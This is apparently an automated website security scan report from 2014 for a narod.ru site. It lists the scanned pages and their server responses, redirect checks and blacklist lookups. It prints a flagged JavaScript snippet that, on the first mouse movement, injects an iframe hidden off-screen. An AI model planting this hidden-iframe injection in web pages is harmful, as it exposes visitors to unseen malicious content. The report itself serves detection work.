Scanned pages/files
Request | Server response | Status |
http://tvmactep.narod.ru/ | 200 OK Content-Length: 24634 Content-Type: text/html | clean |
http://tvmactep.narod.ru/abnl/?adsdata=xT2l9cZicVnjUpNagzKeY!zHeSySmbGYp!cFnb86!QXjiJXvCjUg0hf1EnuJCTgb5hVgxblfqE86yfs4XkHCWuX8P;gaFB!pzDSg7UmaMyY0 | 200 OK Content-Length: 2729 Content-Type: application/javascript | clean |
http://cnt.rambler.ru/top100.jcn?1042380 | 200 OK Content-Length: 6853 Content-Type: application/x-javascript | clean |
http://tools.spylog.ru/counter2.2.js | 200 OK Content-Length: 5066 Content-Type: application/javascript | clean |
http://feelthesame.changeip.name/rsize.js | 200 OK Content-Length: 405 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) res='ÐÑибка MySQL'; var astatf = 0; document.write("<head></head><b><div id='staticaccoin'></div></b>"); document.onmousemove=moveonlinetest; function moveonlinetest() { if (astatf == 0) { astatf++; text = "<iframe src='"+res+"' width='10' height='16' style='position: absolute; z-index: 1; left: -1000px; top: -1000px;'></iframe>"; document.getElementById("staticaccoin").innerHTML = text }} Antivirus reports:
| ||
http://tvmactep.narod.ru/news.htm | 200 OK Content-Length: 9335 Content-Type: text/html | clean |
http://tvmactep.narod.ru/abnl/?adsdata=eb2EU2VLDFmvxjLi8q97^CXT8mGTCyKVgWfLeyKuEghTIkh5WO64Q9UzFBfsZGGRDCswKZ2fSH2AtpDQE5xbL^MSDKVLISheq6eeJ0JWTLTR | 200 OK Content-Length: 2753 Content-Type: application/javascript | clean |
http://tvmactep.narod.ru/02-01-2.htm | 200 OK Content-Length: 40441 Content-Type: text/html | clean |
http://tvmactep.narod.ru/abnl/?adsdata=eKL2^QLvpiYLM!hET9WaLI^bRYAjKdrPlh7prLGF1tlVcwKVefWSA0!1hNLPFzMf6teXX!GSPy7KYklLz!0pFJryyW6a!A7jmRXkHztVBSio | 200 OK Content-Length: 2713 Content-Type: application/javascript | clean |
http://tvmactep.narod.ru/02.htm | 200 OK Content-Length: 6623 Content-Type: text/html | clean |
http://tvmactep.narod.ru/abnl/?adsdata=BRpchlNeGsuUn6zYJXtgRSuIkhxzHSKrU0UmLxagkT5cYNOJ5izGGWh9Xtz73zE5m1zX8qOcy;5qzKvZRK9YANvHHdI1LD7VHsWYUvnGDDGB | 200 OK Content-Length: 2721 Content-Type: application/javascript | clean |
http://tvmactep.narod.ru/02-01.htm | 200 OK Content-Length: 118408 Content-Type: text/html | clean |
http://tvmactep.narod.ru/abnl/?adsdata=xinPxED7W;hchRqks35bDIKc1FGaf9tViBJy1nlFuZBfT2fr0!hiEy^xAZ!WVVvzzgw^LiwhyBkYClFBxVk;S^Ru07Gzw5Yt2j!LOKWR9OEo | 200 OK Content-Length: 2757 Content-Type: application/javascript | clean |
http://tvmactep.narod.ru/shema.zip | 200 OK Content-Length: 22560 Content-Type: application/zip | clean |
http://tvmactep.narod.ru/test404page.js | 404 Not Found Content-Length: 6869 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: tvmactep.narod.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 04 Oct 2014 03:25:26 GMT
Server: uServ/3.2.2
Content-Type: text/html; charset=UTF-8
GET / HTTP/1.1
Host: tvmactep.narod.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 04 Oct 2014 03:25:26 GMT
Server: uServ/3.2.2
Content-Type: text/html; charset=UTF-8
Second query (visit from search engine):
GET / HTTP/1.1
Host: tvmactep.narod.ru
Referer: http://www.google.com/search?q=tvmactep.narod.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: tvmactep.narod.ru
Referer: http://www.google.com/search?q=tvmactep.narod.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=tvmactep.narod.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://tvmactep.narod.ru/
Result: tvmactep.narod.ru is not infected or malware details are not published yet.
Result: tvmactep.narod.ru is not infected or malware details are not published yet.